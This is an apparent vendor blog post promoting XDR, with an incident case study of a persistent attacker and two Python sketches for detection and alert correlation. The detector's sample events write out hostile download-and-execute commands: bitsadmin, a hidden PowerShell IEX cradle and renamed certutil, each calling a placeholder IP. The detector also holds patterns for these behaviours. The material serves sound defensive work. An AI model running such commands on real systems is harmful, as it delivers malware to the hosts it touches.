InfoGuard Cyber Security and Cyber Defence Blog

XDR – The Magic Word for Efficient Defence against Modern Cyber Attacks [Part 1]

Written by Estelle Ouhassi | 09 Sep 2024

The community of security experts bears more responsibility today than ever before. The dramatic increase in cyber attacks using ransomware and phishing calls for dynamic security strategies. Key here is the ability to recognise threats at an early stage and react immediately. With their centralised collection and AI-supported, behaviour-based analysis of data, XDR technologies offer a holistic solution. In this part you will learn how XDR works as an AI-supported technology, how it protects the most common attack vectors 24/7 and actively supports your Security Operation Center (SOC) from “detection” to “response” – vividly illustrated by a concrete IR case.

The Swiss Federal Office for Cybersecurity (BACS) has once again highlighted the dramatic increase in cyber attacks such as phishing and compromised user accounts. Regardless of company size and sector, Security Operation Centers (SOC) are required to identify security gaps in the IT infrastructure, offer comprehensive system protection and detect threats at an early stage. But that’s not all: with the rapid pace of technological progress, there is also a growing need to respond quickly and effectively to suspicious activities and security incidents and to return compromised IT systems to normal operation as quickly as possible. This is an enormous challenge for humans to manage – but with technological support, it no longer feels like magic.

Why is XDR the key to a successful defence?

Extended detection and response (XDR) offers a comprehensive solution by recognising attacks in a company’s digital assets and coordinating response measures. XDR technology thus provides security experts with a holistic view of the security situation.

The essence of XDR is that by implementing this AI-supported technology, endpoints, network traffic and user behaviour can be analysed holistically. By combining various analysis techniques, XDR platforms can recognise threats at an early stage and initiate automated responses that block or at least contain potential attacks. Because XDR takes account of the fact that cyber attackers are increasingly using automation and AI technologies, it makes sense for the defence tool to use the same technological methods.

The holistic and self-learning nature of XDR enables security teams to understand and respond to any type of threat across different vectors. This capability relieves the burden on the company’s SOC while also increasing the effectiveness of cyber defence.

MDR & XDR: central elements in cyber defence

In view of the constantly growing and increasingly complex threat situation, we’re now able to successfully fend off a comparatively high proportion of incidents thanks to self-learning, high-performance endpoint solutions such as managed detection and response (MDR) and extended detection and response (XDR).

The figures speak for themselves: with a 65 percent year-on-year increase in incidents in 2023, customers in around 48 percent of cases found themselves in a compromised but undamaged state. This is due on the one hand to better IT visibility and on the other to the technical support provided by XDR solutions, which are effective in slowing down potential attacks.

Figure 1: More powerful tools are successfully fending off increasing numbers of compromising incidents


The top three attack vectors and how XDR effectively fends them off

For those affected, a cyberattack scenario is like a storm that threatens to plunge everything into chaos – dramatically and scarily! But even in this storm, the stages of the attack follow a clear, (almost) standardised pattern: an attack always starts with what is termed initial access – the critical entry point.

Below we analyse the three entry points at the greatest risk (labelled A1 to A5 in Figure 2):

Figure 2: The most popular entry points and the threat landscape in a year-on-year comparison

  1. Exposed vulnerabilities (A1-A2) remain among the targets with an increased risk of attack. In contrast to 2021, when 50 percent of incidents still occurred via exposed vulnerabilities, 2023 already saw this figure drop to 24 percent. This success is due to the increasing use of cloud-based SaaS services, which has greatly reduced the number of unpatched systems in companies. The analysis of these classic weak points leads us to conclude that attackers compromise the IT infrastructure and sometimes interact with these systems for several months before the actual attack. In this case, an XDR solution can prevent a potential attack, or at least quickly point out unusual activities such as exploit processes.
  2. Another well-known method of attack is phishing (A3). Around 30 percent of the phishing simulations carried out by our pentesters were opened by employees of the companies that commissioned the tests. It’s therefore hardly surprising that phishing attacks increased from 22 percent in 2021 to 27 percent in 2022, and rose yet further in 2023 by a worrying 46 percent. A key factor in the huge increase in phishing is the generative AI tools that are accessible to the masses. These make it possible to design higher-quality phishing campaigns that are difficult for users to recognise. If XDR solutions are installed, they proactively scan the IT systems for phishing attacks and automatically report suspicious activities to the SOC.
  3. A tried-and-tested and still dangerous tactic in the phishing catalogue is the careless opening of unsafe websites (A4). Here, users are urged to download and execute malicious software. XDR monitors web traffic and identifies unsecured URLs. If a threat is suspected, the AI-based XDR system automatically isolates the website in question, examines its behaviour for a possible threat and sends a warning signal to your security team.
  4. The supply chain (A5) represents a vulnerability in the area of cyber security that should not be underestimated. With a C-SCRM plan, companies can significantly protect themselves against cyber risks from insecure supply chains. To this end, they should regularly identify and assess their critical suppliers in order to minimise the associated risks and strengthen their resilience through a diversified supplier base.

Due to the high success rate of phishing, it makes sense to invest in awareness-raising measures:

  1. Sharing passwords and/or two-factor authentication codes
  2. Email attachments that contain malware

XDR offers excellent options for detecting and blocking malware infections on endpoints and responding in a targeted manner.

A case study from our CSIRT: successful defence against a persistent ransomware attacker using phishing

Let’s look at an example to examine the practical benefits of XDR. A company that manages the XDR stack internally was infiltrated by an attacker who deployed a successful phishing campaign to gain access to a user account. In this case, InfoGuard-CSIRT was tasked with performing a compromise assessment to retrospectively investigate the exact facts of the case.

Let’s have a look at the details of the incident together:

24 February – first attempt at a local privilege escalation

As the company had not implemented multi-factor authentication, the attacker could easily access the company’s virtual desktop infrastructure (VDI). On 24 February, the attacker attempted to use an exploit published in October 2021 to extend their privileges. The XDR technology successfully blocked this attempt. The attacker withdrew – for the time being!

Figure 3: Exposed VDI without multi-factor authentication

4 May – another attack attempt using Cobalt Strike

About two-and-a-half months later, the attacker returned and launched a download of Cobalt Strike, an attacker framework for command-and-control activities. This attempt again failed due to the behaviour-based detection by XDR, which recognised the downloading of malicious files or downloads via unusual means such as PowerShell or bitsadmin as suspicious activity and blocked them. Despite further attempts to get the malware onto the system, XDR successfully prevented them all.
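The behaviour-based detection of unusual download methods described above can be sketched as a small rule set that keys on what a process does rather than what it is called. This is an added example with constructed events, not code from the Cortex XDR product or from the case itself; the event fields, host and user names and the 198.51.100.7 address are assumptions.

```python
import re

# Constructed process-creation events (not real telemetry), in the shape
# an endpoint agent would forward to the XDR console.
SAMPLE_EVENTS = [
    {"host": "vdi-17", "user": "jdoe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high http://198.51.100.7/cs.bin C:\\Users\\Public\\cs.bin"},
    {"host": "vdi-17", "user": "jdoe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\""},
    # certutil copied and renamed to look like a system process; only the arguments give it away
    {"host": "vdi-17", "user": "jdoe", "image": r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe",
     "cmdline": "svchost.exe -urlcache -split -f http://198.51.100.7/b.exe b.exe"},
    {"host": "vdi-03", "user": "svc_backup", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\rotate-logs.ps1"},
]

# Behaviour is keyed on the arguments, not on the image name, so a renamed binary still matches.
DOWNLOAD_BEHAVIOURS = {
    "bitsadmin_transfer": re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I),
    "certutil_urlcache": re.compile(r"-urlcache\b.*\s-f\b", re.I),
    "powershell_web_download": re.compile(
        r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Start-BitsTransfer)\b", re.I),
}
EVASION_FLAGS = re.compile(r"(-w(indowstyle)?\s+hidden|-nop\b|-enc\b|-ep\s+bypass)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
EXPECTED_IMAGES = ("bitsadmin", "certutil", "powershell")


def classify(event):
    """Return the download behaviours one event exhibits ([] for a benign event)."""
    return [name for name, rx in DOWNLOAD_BEHAVIOURS.items() if rx.search(event["cmdline"])]


def detect(events):
    """Turn matching events into alerts; severity rises when evasion flags or a renamed binary are seen."""
    alerts = []
    for ev in events:
        behaviours = classify(ev)
        if not behaviours:
            continue
        image_name = ev["image"].rsplit("\\", 1)[-1].lower()
        renamed = not any(tool in image_name for tool in EXPECTED_IMAGES)
        evasive = bool(EVASION_FLAGS.search(ev["cmdline"]))
        alerts.append({
            "host": ev["host"], "user": ev["user"], "behaviours": behaviours,
            "urls": URL_RE.findall(ev["cmdline"]), "renamed_binary": renamed,
            "severity": "high" if (renamed or evasive) else "medium",
        })
    return alerts
```

Running `detect(SAMPLE_EVENTS)` yields three alerts; the scheduled maintenance script on vdi-03 is left alone.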

Figure 4: Renewed attack attempts via unusual download methods

22 June – the attacker does not give up – and fails again against XDR

The attacker returned on 22 June, presumably motivated by new ideas. After researching the web, they seem to have come across a blog article published in May that describes a method for enhancing privileges. The attacker launched the commands as described in the article, regardless of the fact that the target company’s environment was not akin to the infrastructure mentioned in the article. The XDR technology also successfully blocked this attempted attack.

Figure 5: A blog article serves as the basis for another attempt – without success!

July – exploit, Cobalt Strike and the unsuccessful attempt to uninstall Cortex XDR

On 5 July, the attacker attempted to uninstall the security software Cortex XDR and failed thanks to tamper protection. On 16 July, they used an exploit that had only been published two days earlier. The XDR solution also recognised and blocked this attack. The attacker still refused to give up and returned the next day. Once again they tried to attack with Cobalt Strike – once again unsuccessfully!

Figure 6: Failed attempt to uninstall Cortex XDR

Figure 7: XDR blocks further attack attempts via exploits and Cobalt Strike

Conclusion: analysis of an (only just) unsuccessful cyber incident

The attacker was unable to cause any damage despite persistent attempts at an attack. It has to be said that the company was lucky: not only did the attacker behave in a relatively inexperienced manner, their activities were spread out across a longer timeline. Experience shows that attack attempts and successful intrusions are happening increasingly close together these days.

Without the XDR solution, the attack would have led to a successful ransomware compromise in February or March. After analysing and reconstructing the attack, our most urgent recommendation to the company was to implement multi-factor authentication to prevent future attacks.

This case illustrates how state-of-the-art, behaviour-based technologies such as the XDR solution successfully fend off potential attacks. At the same time, this example also emphasises the need for clear processes, established instructions and safety guidelines in order to be able to react appropriately to alerts.

How do XDR solutions optimise detection and response?

Let’s examine the basic components and functionalities of XDR systems and their integration into the corporate infrastructure.

Figure 8: Overview of the capabilities of an XDR stack

Basic XDR architecture and how it works

XDR systems can be sourced from various providers such as Microsoft, CrowdStrike and Palo Alto. A central element of this architecture is agent-based data acquisition. Agents fulfil two essential functions on the operating systems:

  • Prevention through behaviour-based approaches: The agent-based technology offers behaviour-based prevention. This is crucial because attackers try to disguise malware by renaming system processes or masking themselves in some other way. Behaviour-based prevention identifies and blocks attacks by identifying unusual activities.
  • Agent-based data delivery: Agents ensure reliable delivery of data to the XDR console. The console collects all data centrally in a data lake and uses it for further analyses.

Integration and data collection

Various data sources need to be integrated to obtain a complete overview of the security situation:

  • Cloud solutions and API connections: Cloud services are usually integrated via APIs or through the incorporation of event data, extending data collection beyond the endpoints.
  • Identity providers: The integration of identity providers, both in the cloud and on site (e.g. Active Directory), is essential for the management of identities and access protection.
  • Log sources: XDR systems should integrate all relevant log sources, including firewall and mail systems as well as application systems. This data is normalised and stored centrally in the data lake.

Analytical, AI-based capabilities and ability to act

The XDR console offers extensive analytical functions that are enhanced by the data collected:

  • Correlation and prioritisation: XDR systems correlate and group alerts to create a clearer picture of the situation. Alerting and prioritisation help to quickly identify and evaluate the relevant incidents.
  • Extended visibility: The integration of all relevant data sources and the AI-supported analysis provide a comprehensive view of the attacker data and allow security teams to respond to threats in a targeted and effective manner.
  • Introduction of containment measures: The XDR technology supports action measures. However, this often requires additional processes, such as resetting passwords.
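The correlation and prioritisation step in this list can be sketched as a small grouping-and-scoring routine: alerts from the same host and user within a time window become one incident, and an incident scores higher the worse its alerts are, the more of them there are, and the more often the same host has already been hit (the persistent attacker of the case study). This is an added example, not the logic of any vendor's XDR console; the severity weights, the 48-hour window and the constructed alerts (loosely modelled on the case study timeline) are assumptions.

```python
from datetime import datetime, timedelta

SEVERITY_WEIGHT = {"low": 1, "medium": 3, "high": 7, "critical": 10}
WINDOW = timedelta(hours=48)  # alerts on the same host/user closer than this belong to one incident

# Constructed alerts loosely following the case study timeline (not the real case data).
SAMPLE_ALERTS = [
    {"ts": "2024-02-24T09:12:00Z", "host": "vdi-17", "user": "jdoe", "severity": "high", "name": "local_privilege_escalation_blocked"},
    {"ts": "2024-05-04T10:02:00Z", "host": "vdi-17", "user": "jdoe", "severity": "medium", "name": "unusual_download_bitsadmin"},
    {"ts": "2024-05-04T10:05:00Z", "host": "vdi-17", "user": "jdoe", "severity": "high", "name": "c2_framework_download_blocked"},
    {"ts": "2024-05-04T10:30:00Z", "host": "vdi-03", "user": "svc_backup", "severity": "low", "name": "scheduled_script_new_path"},
    {"ts": "2024-07-05T14:00:00Z", "host": "vdi-17", "user": "jdoe", "severity": "critical", "name": "agent_uninstall_attempt_blocked"},
    {"ts": "2024-07-16T08:20:00Z", "host": "vdi-17", "user": "jdoe", "severity": "high", "name": "exploit_attempt_blocked"},
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def correlate(alerts):
    """Group alerts into incidents keyed by (host, user); a gap larger than WINDOW opens a new incident."""
    incidents = []
    open_by_key = {}
    for a in sorted(alerts, key=lambda x: parse_ts(x["ts"])):
        key = (a["host"], a["user"])
        cur = open_by_key.get(key)
        if cur is None or parse_ts(a["ts"]) - parse_ts(cur["alerts"][-1]["ts"]) > WINDOW:
            cur = {"host": a["host"], "user": a["user"], "alerts": []}
            incidents.append(cur)
            open_by_key[key] = cur
        cur["alerts"].append(a)
    return incidents


def prioritise(incidents):
    """Score = weight of the worst alert + 2 per extra alert + 3 per earlier incident on the same host/user."""
    seen = {}
    for inc in incidents:  # incidents arrive in chronological order from correlate()
        key = (inc["host"], inc["user"])
        worst = max(SEVERITY_WEIGHT[a["severity"]] for a in inc["alerts"])
        inc["score"] = worst + 2 * (len(inc["alerts"]) - 1) + 3 * seen.get(key, 0)
        inc["tamper_attempt"] = any("uninstall" in a["name"] for a in inc["alerts"])
        seen[key] = seen.get(key, 0) + 1
    return sorted(incidents, key=lambda i: i["score"], reverse=True)
```

On the sample data the attempt to uninstall the agent ends up at the top of the queue, and the repeat visits to vdi-17 outrank the single low-severity alert on vdi-03.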

Seamless embedding of XDR systems in your security strategy is a significant advantage for efficient cyber defence. This ensures that your Security Operation Center (SOC) is optimally positioned and meets the highest security standards 24/7.

“ISO 27001:2022”-certified consulting for a SOC at the highest level

Is your organisation focused on building a successful, centrally controllable cyber defence concept that supports your Security Operation Center (SOC) around the clock? You now know that you can hugely enhance the potential of your cyber defence with an XDR stack.  

We’ll be happy to support you with planning and concrete implementation. Our “ISO 27001:2022”-certified security experts will advise you on planning and concrete implementation and help you determine the most suitable XDR product for your IT environment.

Deepen your insight into the benefits of XDR systems

Our two-part blog series on “The Magic Word for Efficient Defence against Modern Cyber Attacks” gives you a complete 360-degree perspective:


Also for streaming: Ernesto Hartmann, Chief Cyber Defence Officer, and Sandro Bachmann, Senior Incident Responder, discussed how XDR can be used to effectively defend against cyber threats during an InfoGuard Security webcast. 

The recording of this webcast is available as a YouTube video. It's well worth listening to!
